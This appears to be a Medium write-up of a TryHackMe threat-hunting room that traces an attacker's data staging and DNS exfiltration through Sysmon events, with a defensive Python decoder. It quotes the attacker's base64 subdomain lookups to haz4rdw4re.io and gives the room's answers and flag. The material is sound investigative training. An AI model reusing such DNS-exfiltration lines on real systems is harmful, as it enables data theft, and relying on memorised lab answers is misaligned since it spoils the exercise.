THM : Hunt Me I: Payment Collectors Part. 2

M. Said Eddak
3 min read · Mar 15, 2024

--

Scenario: A Senior Finance Director from a company downloaded a malicious zip. We are called in to conduct an investigation.

Continuation of Part 1, which can be found here: https://medium.com/@MDK_BE/thm-hunt-me-i-payment-collectors-part-1-060de5030d8d

9. What directory did the attacker copy the contents of the file share to?

We know that the attacker copied the contents of the file share to the local computer in order to exfiltrate them. Based on this crucial information, we look for file creation events (Sysmon Event ID 11) using:
winlog.event_id: 11

We clearly see that the attacker copied various files into the “C:\Users\michael.ascot\Downloads\exfiltration” directory, so that is the directory used to stage the exfiltration.

Answer : C:\Users\michael.ascot\Downloads\exfiltration

10. What was the name of the Excel file the attacker extracted from the file share?

From the same file creation events (the screenshot from question 9), we can see that the attacker copied the “ClientPortfolioSummary.xlsx” Excel sheet to the exfiltration directory.

Answer : ClientPortfolioSummary.xlsx

11. What was the name of the archive file that the attacker created to prepare for exfiltration?

From the screenshot in question 9, we also see that the attacker created a zip file called “exfilt8me.zip”.

Answer : exfilt8me.zip

12. What is the MITRE ID of the technique that the attacker used to exfiltrate the data?

Answering questions 13 and 14 before this one helps us understand how the attacker exfiltrated the data: the attacker used nslookup to exfiltrate data through a series of base64-encoded subdomains.

Based on that, when we search the techniques listed under the Exfiltration tactic (TA0010), we find one that fits: T1048 Exfiltration Over Alternative Protocol. It matches the technique used by the attacker. From the description:

Alternate protocols include FTP, SMTP, HTTP/S, DNS, SMB, or any other network protocol not being used as the main command and control channel. Adversaries may also opt to encrypt and/or obfuscate these alternate channels.

Answer : T1048

13. What was the domain of the attacker’s server that retrieved the exfiltrated data?

Searching for winlog.event_id: 1 (process creation), we see that the attacker made heavy use of the nslookup tool to query the domain haz4rdw4re.io with various subdomain names that appear to be base64 encoded.

Answer : haz4rdw4re.io

14. The attacker exfiltrated an additional file from the victim’s workstation. What is the flag you receive after reconstructing the file?

To answer this question, we decode the last two base64-encoded subdomains using CyberChef:
- RmYjEyNGZiMTY1NjZlfQ==.haz4rdw4re.io
- VEhNezE0OTczMjFmNGY2ZjA1OWE1Mm.haz4rdw4re.io
The subdomain labels are chunks of a single base64 string, so they are joined in the order they were sent (the chunk starting with VEhN, which decodes to THM, comes first, and the == padding marks the final chunk) and then decoded, which gives the following flag:

Answer : THM{1497321f4f6f059a52dfb124fb16566e}
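As an added example, not part of the original writeup, here is how the pivots in questions 13 and 14 can be scripted over exported Sysmon events: count which parent domain nslookup queries most often, then join the subdomain chunks sent to that domain in time order and base64-decode them. The event records below are constructed to mirror the two chunks above; the field names (event_id, CommandLine, TargetFilename) are assumed to follow the Sysmon schema.

```python
import base64
import re
from collections import Counter

# Constructed sample events in the shape of the fields this writeup searched
# (event_id 1 = Sysmon process creation, 11 = Sysmon file creation).
SAMPLE_EVENTS = [
    {"@timestamp": "2024-03-15T10:00:01Z", "event_id": 1,
     "CommandLine": "nslookup VEhNezE0OTczMjFmNGY2ZjA1OWE1Mm.haz4rdw4re.io"},
    {"@timestamp": "2024-03-15T10:00:02Z", "event_id": 11,
     "TargetFilename": r"C:\Users\michael.ascot\Downloads\exfiltration\exfilt8me.zip"},
    {"@timestamp": "2024-03-15T10:00:03Z", "event_id": 1,
     "CommandLine": "nslookup RmYjEyNGZiMTY1NjZlfQ==.haz4rdw4re.io"},
    {"@timestamp": "2024-03-15T10:00:04Z", "event_id": 1,
     "CommandLine": "nslookup www.example.com"},   # benign noise
]

# nslookup may be given options before the name; take the first non-option token.
NSLOOKUP_RE = re.compile(r"nslookup\s+(?:-\S+\s+)*(\S+)", re.IGNORECASE)


def nslookup_queries(events):
    """Return (timestamp, fqdn) for every process-creation event that ran nslookup."""
    out = []
    for ev in sorted(events, key=lambda e: e["@timestamp"]):
        if ev.get("event_id") != 1:
            continue
        m = NSLOOKUP_RE.search(ev.get("CommandLine", ""))
        if m:
            out.append((ev["@timestamp"], m.group(1)))   # keep case: base64 is case-sensitive
    return out


def busiest_parent_domain(events):
    """Parent domain (last two labels) queried most often: the question 13 pivot."""
    counts = Counter(".".join(fqdn.lower().split(".")[-2:]) for _, fqdn in nslookup_queries(events))
    return counts.most_common(1)[0][0]


def reconstruct_exfil(events, domain):
    """Join the subdomain labels sent to `domain` in time order and base64-decode them."""
    suffix = "." + domain.lower()
    chunks = [fqdn[: -len(suffix)] for _, fqdn in nslookup_queries(events)
              if fqdn.lower().endswith(suffix)]
    blob = "".join(chunks).rstrip("=")
    blob += "=" * (-len(blob) % 4)   # re-pad: only the last chunk carried the '=' padding
    return base64.b64decode(blob).decode("utf-8", errors="replace")


if __name__ == "__main__":
    dom = busiest_parent_domain(SAMPLE_EVENTS)
    print(dom, reconstruct_exfil(SAMPLE_EVENTS, dom))
```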
